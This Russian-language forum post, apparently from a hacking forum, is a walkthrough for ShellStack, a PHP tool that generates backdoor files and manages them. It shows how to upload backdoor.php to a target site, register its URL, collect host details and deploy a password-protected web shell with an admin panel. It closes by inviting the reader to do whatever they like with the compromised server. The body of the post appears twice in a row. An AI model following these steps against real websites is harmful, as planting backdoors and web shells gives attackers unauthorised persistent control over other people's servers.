Vander
15.06.2017, 23:43
Приветствую! Здесь речь пойдет о ShellStack – это инструмент на PHP, его предназначением является, менеджмент бэкдоров на целевом сайте.
Под словом менеджмент, я подразумеваю управление, создание, загрузка на целевой хост.
https://forum.antichat.xyz/attachments/4779361/img_f9fe05f724.png
ShellStack - этот инструмент подходит для пентестеров, которые хотят отслеживать каждое движение на сайте, который они взламывают. Инструмент генерирует бэкдор-файл, который вам просто нужно загрузить на сайт, и поместить URL-адрес backdoor’a в файл shells.txt, присутствующий в каталоге инструмента.
Клонируем инструмент на свою машину с Github.
> git clone https://github.com/Tuhinshubhra/shellstack
> cd shellstack
https://forum.antichat.xyz/attachments/4779361/img_758970cc59.png
Запускаем:
> php shellstack.php
https://forum.antichat.xyz/attachments/4779361/img_917bf1776d.png
Теперь необходимо сгенерировать backdoor, пишем команду:
> generatebd
https://forum.antichat.xyz/attachments/4779361/img_3048af35e8.png
Выходим из программы Ctrl+C.
В папке с ShellStack находим backdoor.php и загружаем его на целевой сервер.
https://forum.antichat.xyz/attachments/4779361/img_8fe9debb2e.png
Копируем URL нашего backdoor:
https://forum.antichat.xyz/attachments/4779361/img_7af1c6b842.png
И вставляем его в файл shells.txt:
> echohttp://172.16.0.223/pentest/backdoor.php> shells.txt
https://forum.antichat.xyz/attachments/4779361/img_9dc542206a.png
Запускаем ShellStack:
> php shellstack.php
Видим, что наш бэкдор находится под номером 0. Выбираем его для запуска.
> 0
https://forum.antichat.xyz/attachments/4779361/img_27c3077457.png
Открывается список доступных действий:
https://forum.antichat.xyz/attachments/4779361/img_780efd0733.png
Узнаем немного больше о целевом хосте:
> 2
https://forum.antichat.xyz/attachments/4779361/img_6df7538189.png
Теперь можно загрузить шелл, которым потом воспользуемся для получения дополнительных плюшек:
> 1
https://forum.antichat.xyz/attachments/4779361/img_3262c10748.png
Обращаем внимание на то, что у каждого шелла есть пароль/логин.
Теперь, обращаемся на целевой хост по адресу находящегося там шелла, он загружается туда автоматически:
https://forum.antichat.xyz/attachments/4779361/img_0629a391ff.png
> 172.16.0.223/pentest/kurama.php
Вводим пароль к шеллу и попадаем в административную панель:
https://forum.antichat.xyz/attachments/4779361/img_634da52ad4.png
Дальше, посредством этих красных кнопочек делаем с сервером/сайтом, что позволит нам воображение/благоразумие.
Спасибо за внимание.
Под словом менеджмент, я подразумеваю управление, создание, загрузка на целевой хост.
https://forum.antichat.xyz/attachments/4779361/img_f9fe05f724.png
ShellStack - этот инструмент подходит для пентестеров, которые хотят отслеживать каждое движение на сайте, который они взламывают. Инструмент генерирует бэкдор-файл, который вам просто нужно загрузить на сайт, и поместить URL-адрес backdoor’a в файл shells.txt, присутствующий в каталоге инструмента.
Клонируем инструмент на свою машину с Github.
> git clone https://github.com/Tuhinshubhra/shellstack
> cd shellstack
https://forum.antichat.xyz/attachments/4779361/img_758970cc59.png
Запускаем:
> php shellstack.php
https://forum.antichat.xyz/attachments/4779361/img_917bf1776d.png
Теперь необходимо сгенерировать backdoor, пишем команду:
> generatebd
https://forum.antichat.xyz/attachments/4779361/img_3048af35e8.png
Выходим из программы Ctrl+C.
В папке с ShellStack находим backdoor.php и загружаем его на целевой сервер.
https://forum.antichat.xyz/attachments/4779361/img_8fe9debb2e.png
Копируем URL нашего backdoor:
https://forum.antichat.xyz/attachments/4779361/img_7af1c6b842.png
И вставляем его в файл shells.txt:
> echohttp://172.16.0.223/pentest/backdoor.php> shells.txt
https://forum.antichat.xyz/attachments/4779361/img_9dc542206a.png
Запускаем ShellStack:
> php shellstack.php
Видим, что наш бэкдор находится под номером 0. Выбираем его для запуска.
> 0
https://forum.antichat.xyz/attachments/4779361/img_27c3077457.png
Открывается список доступных действий:
https://forum.antichat.xyz/attachments/4779361/img_780efd0733.png
Узнаем немного больше о целевом хосте:
> 2
https://forum.antichat.xyz/attachments/4779361/img_6df7538189.png
Теперь можно загрузить шелл, которым потом воспользуемся для получения дополнительных плюшек:
> 1
https://forum.antichat.xyz/attachments/4779361/img_3262c10748.png
Обращаем внимание на то, что у каждого шелла есть пароль/логин.
Теперь, обращаемся на целевой хост по адресу находящегося там шелла, он загружается туда автоматически:
https://forum.antichat.xyz/attachments/4779361/img_0629a391ff.png
> 172.16.0.223/pentest/kurama.php
Вводим пароль к шеллу и попадаем в административную панель:
https://forum.antichat.xyz/attachments/4779361/img_634da52ad4.png
Дальше, посредством этих красных кнопочек делаем с сервером/сайтом, что позволит нам воображение/благоразумие.
Спасибо за внимание.